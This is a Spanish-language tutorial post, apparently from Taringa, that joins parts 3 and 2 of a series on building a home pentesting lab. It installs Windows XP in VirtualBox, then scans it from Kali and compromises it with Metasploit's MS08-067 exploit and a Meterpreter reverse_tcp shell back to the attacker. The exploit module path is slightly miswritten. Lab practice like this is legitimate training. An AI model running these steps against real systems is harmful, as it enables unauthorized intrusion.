master_darius

Este tutorial está puramente hecho con fines educativos, no me hago responsable por la manera en que se usen los conocimientos aquí obtenidos. ¿Que tal todo viejas? Bienvenidos de nuevo a este tutorial de como armar tu laborario de pentesting para poder practicar kacking sin que manches tu expediente. En esta parte final vamos a probar nuestro laboratorio de pentesting a ver si está todo funcional, y la manera en que lo probaremos será hackeando la máquina de Windows XP. Ya deberían tener en Virtualbox las maquinas virtuales necesarias, Kali Linux y Windows XP. Si no es así probablemente te perdiste los posts anteriores, así que te recomiendo pasar por ahí para que puedas poner en funcionamiento esta parte del tutorial. Parte 1 | Parte 2 Procedimientos: Primero abrimos Virtualbox para configurar la conexión de nuestras máquinas entre sí. Deben tener al menos las tres máquinas virtuales que creamos anteriormente, algo así: Entren en la configuración de la máquina de Kali Linux como hemos hecho anteriormente (click derecho, configuración) y busquen el menu de la "red". Asegurense de que el adaptador de red este habilitado y en la opción "conectado a" pongan "Adaptador solo-anfitrión". De esta manera su máquina virtual se conectará solamente a una red creada por Virtualbox, a la cual solo se pueden conectar su computadora real y las máquinas virtuales. Debería quedar así: Le dan al botón aceptar y ya está hecho, ahora la máquina de Kali está conectada a la red interna y se puede comunicar con las demás computadoras dentro de ella. Hagan lo mismo con la máquina de Windows XP, y cuando terminen ya todo estará configurado para empezar a probar. Inicien las dos máquinas, la de Kali y la de Windows XP (si tienen poca ram, cierren todos los programas que tienen abierto) Todo listo. Ahora empecemos en Windows XP verificando que el Firewall esté desactivado. Se supone que es una guia para principiantes, y con el Firewall activado ya sería mucho mas complicado entender el proceso. Aquí lo vemos desactivado (se puede ver diferente dependiendo de la versión del windows) Ahora abrimos el símbolo del sistema (cmd). Se abre presionando alt + r, escriben "cmd" (sin las comillas) y le dan enter. Con el cmd abierto ahora debemos averiguar la dirección IP de esta máquina, que sería una serie de números que la identifican en la red para que los otros sistemas puedan ubicarla. Esto se hace fácilmente escribiendo "ipconfig" y pulsando enter. De ahi sacan la dirección IP que saldría en el mismo sitio que señalo en la siguiente imagen: (Solo es una imagen de referencia, los números lo deben copiar de su máquina virtual) Anoten la dirección IP en alguna parte y ahora nos vamos a la máquina de Kali Linux. En ella abrimos la terminal como hicimos antes (el icono de la barra superior que sale algo así: >_ ) y probamos hacerle ping a la dirección que copiamos de la máquina de Windows XP. Hacer ping es como preguntar "¿hay alguien ahí?" en la dirección proporcionada y esperar un tiempo a ver si algun sistema responde. Normalmente el Firewall desactiva esto por seguridad, pero como tenemos el Firewall desactivado deberíamos recibir una respuesta. Entonces, como decía, escribimos "ping xxx.xxx.xxx.xxx" (cambiando las "x" por la dirección que le corresponde a la máquina de windows) y le damos enter. Les debería salir algo así: Si no les sale error entonces todo está bien. Denle a las teclas ctrl + c para que se detenga y empecemos con la parte de hacking. Tiempo de explicaciones, recomendado leerlo. Para hackear una computadora, es necesario primero analizarla para encontrar los servicios que corren en ella. Estos servicios abren un puerto, que es una entrada o salida de datos que permite que los sistemas exteriores establezcan una comunicación con esta computadora en ese puerto. Una vez analizada la computadora se le busca a uno de esos servicios una vulnerabilidad que pueda ser explotada. Una vulnerabilidad es como una falla donde se puede engañar al sistema y hacer que este haga lo que nosotros queramos. A esta vulnerabilidad se le aplica un exploit, el cual se encarga de permitir la entrada de un payload a la máquina objetivo. El payload es lo que ya permite que hagas lo que quieras con la máquina despues de subírselo. Veamoslo represantado de otra manera: una vacuna. Para aplicarla primero buscas una vena (sería la vulnerabilidad de algún servicio). Cuando la encuentras, con la aguja (exploit) atraviesas la piel hasta que llegas a la vena, y dentro de esta inyectas dicha vacuna (payload). Ahora que ya está todo medio explicado, procedamos a aplicarlo en la práctica. Dentro de la misma terminal que abrieron en Kali Linux, escriban esto "nmap -O xxx.xxx.xxx.xxx" y denle enter. Como siempre, remplacen las "x" con la IP de su máquina de windows. Debería salirles algo así: Ahí vemos que en mi caso la máquina tiene tres puertos abiertos, es decir, tres servicios corriendo en los que que podríamos buscar una vulnerabilidad y aplicar un exploit para conseguir nuestro objetivo. Estos puertos son el 135, 139 y 445. Con esta información ya va siendo hora de que abramos lo que vamos a utilizar para explotar las vulnerabilidades: Metasploit. Para ello primero hay que habilitar unos servicios en Kali Linux que no vienen activados por defecto y que son necesarios para que este funcione. En la misma terminal donde están haciendo todo (o en otra si cerraron la anterior) escriban lo siguiente: "service postgresql start" (sin comillas) y le dan enter. Esto es para iniciar un servidor SQL que Metasploit necesita para guardar varios datos. Esto durara unos segundos iniciándose y luego debería salir un "ok" verde. Eso indicará que se ha iniciado Ahora debemos iniciar el servicio de Metasploit para poder usarlo. En la misma terminal escriben esto "service metasploit start" sin comillas y le dan enter. Siendo la primera vez que lo ejecutan se crearan unas bases de datos donde se guardarán varios datos, y luego se iniciaran los servidores necesarios para su funcionamiento. Debería quedar así: Ahora ejecuten la consola del metasploit poniendo el siguiente comando en la ventana del terminal: "msfconsole". Le dan enter y esperan un rato (al menos asi fue en mi caso). Les saldra un dibujo ascii y la información de la versión de Metasploit que están usando. La consola de Metasploit estará esperando su próxima instrucción. Para hackear la otra máquina virtual debemos utilizar una vulnerabilidad dentro de los servicios de ella. Ya que Windows XP tiene sus años y nosotros dejamos el Firewall desactivado y todo eso, no hace falta matarse buscando cual exploit usar. Primero empecemos buscando exploits sobre "netapi" en Metasploit. Escriban "search netapi" y denle enter. Les saldrán varios exploits, pero habrá uno en especial que usaremos: Como vemos sale un exploit para el servicio de servidor de Windows. Para usarlo escriban "use exploit/windows/smb/ms08/067_netapi" y le dan enter. Ahora Metasploit señalará que lo tenemos seleccionado No sabemos como sirve el exploit, así que escribimos "show options" y le damos enter para que nos muestre las opciones. Como vemos, nos dice que debemos especificar la dirección del objetivo. Ponemos el siguiente comando: "set RHOST xxx.xxx.xxx.xxx". De nuevo, cambien las "x" por su dirección IP respectiva. Le dan enter y el programa les mostrará el cambio. Ahora debemos elegir el payload que vamos a usar. En este caso usaremos uno que se llama Meterpreter que nos permite hacer varias cosas. Para hacerlo ponemos el siguiente comando: "set PAYLOAD windows/meterpreter/reverse_tcp". Le damos enter y de nuevo nos mostrará el cambio: Este payload tambien necesita que específiquemos la IP donde se abrirá la sesión del Meterpreter. Para hacerlo primero necesitamos averiguar nuestra IP, escribiendo "ifconfig" y dandole enter. Vemos cual es nuestra ip (como les dije antes, la imagen solo es de referencia, busquen la suya) y listo. Ahora procedemos a escribir "set LHOST xxx.xxx.xxx.xxx" (cambiandole las "x" de nuevo) y el programa nos responderá acordemente. Ya tenemos todo listo. Ahora falta la ejecución de todo. Solo escriban "exploit" y denle enter. Si terminan con algo que dice "meterpreter" significa que está todo listo. Enjoy. Ahora que tenemos abierta la sesión de meterpreter podemos hacer muchas cosas en la máquina que hemos hackeado. En este caso yo he hecho algo especial para los taringueros (y te lo muestro). Empezamos abriendo la shell de Windows escribiendo "shell" y dandole enter. Si tienen conocimientos medios de windows sabrán que acaban de abrir una consola del símbolo del sistema. Ahora continuamos yendo al disco C: y luego de eso escribimos nuestro mensaje. Mientras tanto, el usuario de windows estaba revisando sus archivos cuando encuentra algo desconocido... Lo abre y se encuentra con una sorpresa que procede a denunciar. Listo, ya han hackeado una computadora. Este es el primer paso que han tomado para adentrarse en el hacking, y aunque parezca difícil todo esto, apenas están nadando en un charco mientras lo bueno está en el oceano. Pero aprender hacking también tiene su truco, recuerdo haberlo leido en una revista de videojuegos cuando era pequeño. Es el truco de las tres "P": Practica, Paciencia y Perseverancia. Si siguen practicándolo constantemente con el tiempo conseguirán una habilidad increible que quizás hasta les consiga un trabajo digno. Solo ponganle esfuerzo en aprender y ahí les irá bien. Y así acaba este tutorial de hacking. Si les ha funcionado todo correctamente, perfecto, ahora pueden continuar escuadriñando el internet en busca de más tutoriales. Intenten hackear la máquina virtual con el firewall activado, etc. Yo seguiré posteando más tutoriales de hacking, pero probablemente me tomaré más tiempo en hacerlos, ya que tampoco estoy tan avanzado en esto. Si no les ha funcionado, no duden en hablarme de su problema y trataré de solventarlo. Espero que les haya ido bien y que sigan progresando. Comenten lo que piensen, compartan el post y nos vemos hasta la próxima.

Este tutorial está puramente hecho con fines educativos, no me hago responsable por la manera en que se usen los conocimientos aquí obtenidos. Hola de nuevo linces, troesmas, maquinolas. Soy @master_darius y Aquí vengo con la parte 2 de este tutorial. Si no han visto la parte anterior, les recomiendo pasarse por mi post para que puedan tener un mejor entendimiento. Post anterior aquí. En la parte anterior vimos como instalar Kali Linux en Virtualbox. Ahora en esta parte veremos como instalar Windows XP en ese mismo programa. Si ya hicieron la primera parte de este tutorial y ya han instalado Windows XP alguna vez en su vida entonces esto debería ser un paseo por la home. Supondré que ya tienen un CD o ISO de Windows XP y que ya instalaron Virtualbox. Parte 3 ya disponible Procedimientos: Primero abren Virtualbox y le dan a la opción de crear una máquina nueva: Ahora lo deben configurar. El nombre al igual que antes es lo que prefieran. En el tipo deben poner Microsoft Windows, y en la versión deben poner Windows XP (32 o 64 bit dependiendo de su CD/ISO, seguramente 32). Ahora le dan siguiente y deben elegir el tamaño de la memoria. Según Microsoft, 64 MB de RAM es lo mínimo, y lo recomendado es 128 MB. Según Virtualbox lo recomendado es 192 MB, y ya que es su entorno en el que lo estamos instalando me imagino que tienen razón. En este caso le pondré 256 MB para ver si así se instala mas rápido, pero pueden ponerle lo que quieran siempre y cuando sea mas que el mínimo. Además, siempre se le puede cambiar. Le dan siguiente y ahora sale lo del disco duro virtual. Elijan "crear disco duro virtual ahora" Y le dan al botón crear. Ahora les saldrá lo del tipo de disco duro virtual. Vean que todo está como en la imagen, y si es así, sigamos el consejo de Virtualbox y dejémoslo todo como está. Le dan siguiente y ahora sale lo de si fijo o dinámico. Como dije antes, es cuestión de gustos, si prefieres tener todo el espacio del disco duro virtual apartado desde el principio, elige fijo. Si prefieres que Virtualbox lo vaya apartando a medida que lo necesita (ahorrándote ese espacio), elige dinámico. Yo prefiero dinámico: Ahora deben elegir el tamaño de su disco duro virtual. Yo creo que el mínimo es 2 GB para el Windows solo, pero dependiendo de lo que tengan pensado instalarle deben ponerle más, si quieren aprender SQL Injection o cosas así obviamente necesitan el espacio para instalar las herramientas, por ejemplo, el servidor SQL. Le dan crear y ya tienen su máquina virtual lista para que se le instale Windows XP. Para hacer esto lo primero que haremos será montar el CD/ISO en la unidad de disco virtual. Denle click derecho al nombre de su maquina virtual en la lista de la derecha (Seguro solo sale esa y la de Kali que instalamos antes). Entonces como iba diciendo, le dan click derecho y entran en la configuración. Ahora le dan almacenamiento, vació, le dan al icono del CD y eligen el CD que van a usar. Si es una imagen de disco virtual (.iso y esos) le dan la primera opción. Si es un CD real físico eligen la "unidad anfitrión" que corresponda. Elijan lo que vayan a elegir, y después le dan aceptar y doble click a la máquina de Windows XP para iniciarla. Debería iniciar directamente al CD de instalación de Windows XP y empezar a cargar los archivos. Les sale para elegir la partición donde se va a instalar, pero como no hay ninguna hay que crearla. Apreten la letra 'c' para crearla. Les saldra el tamaño máximo directamente, y como es solo una máquina virtual no nos molestaremos en dividir su disco en varias particiones. Le dan enter y ya sale su partición nueva. Escójanla y denle enter para continuar con la instalación. Ahora les preguntará como formatear la nueva partición. Denle a la de NTFS (pero no la rápida, la normal). Le dan enter y esperan a que se copien los archivos para iniciar con la instalación de Windows. Luego se reiniciará la computadora y les saldrá para iniciar desde el CD. No deben apretar nada, solo esperar a que salga lo de la instalación. Luego de eso deben seguir esperando mientras la instalación procede. Pueden salir a comprarse una Manaos o a rebajar unos kilos si están subidos de rango, la instalación podría durar un rato. Después de eso les pedirá unos cuantos datos para configurar su PC. Nombre, contraseña, zona regional, serial, etc. Llénenlos como quieran dependiendo de su caso. Después de eso se seguirá instalando por un rato hasta que se reinicie e inicie Windows. Ahora inicien sesión si le pusieron contraseña. Ya deberían estar en el escritorio de Windows XP "Qué porquería, la ventana se ve como un Windows para hormigas". Esperen, ya vamos a eso. Hagan lo mismo que hicimos antes con Kali Linux, en la ventana del virtualbox de Windows XP (la de la maquina virtual) le dan a dispositivos/"insertar imagen cd de la guest additions". Les debería salir lo siguiente: Denle siguiente como locos hasta que se instale. Luego le dan finalizar y se reiniciará solo. Ahora cambiarle el tamaño a la ventana del Virtualbox y el Windows automáticamente cambiará la resolución. Si todo está bien entonces ahora apaguen la máquina virtual y hagamos algo. En la ventana principal del Virtualbox (donde salen todas las máquinas) denle click derecho a la máquina del Windows XP. Denle a la opción clonar y les debería salir esta ventana. De nombre ponganle lo que quieran, pero de preferencia algo que identifique que es un respaldo. Le dan siguiente y en la siguiente ventana se aseguran de que esté marcada la opción "clonación completa". Le dan a clonar y esperan un rato a que se clone. Ahí está, una máquina nueva que es un clon de la de Windows XP. ¿Para qué hacemos esto?. Pues si por casualidad del destino llegamos a dañar algo de la máquina del Windows XP original, lo que haremos es borrarla y clonar la máquina respaldada. Así no tendremos que pasar por esa fastidiosa instalación de Windows XP nuevamente. Por eso siempre deben usar la máquina de Windows XP original y no la respaldada (no queremos dañar las dos). Así ya todo está listo, ahora solo falta configurar la red interna y empezar a probar para ver si todo está perfecto para practicar hacking. Eso será en la próxima parte de este tutorial Y así culmina esta parte del tutorial. Espero que les haya funcionado, cualquier duda o error me postean un comentario y les responderé para tratar de solucionarlo. Comenten que tal les pareció, si hay algo que debería describir más en la próxima parte, y cualquier sugerencia que tengan la apreciaré sin duda. Nos vemos hasta la próxima! (Si no leíste un carajo y estabas buscando la parte uno pero no la encontraste, aquí está) http://www.taringa.net/posts/hazlo-tu-mismo/18784406/Como-practicar-hacking-sin-ir-preso-Pt-1.html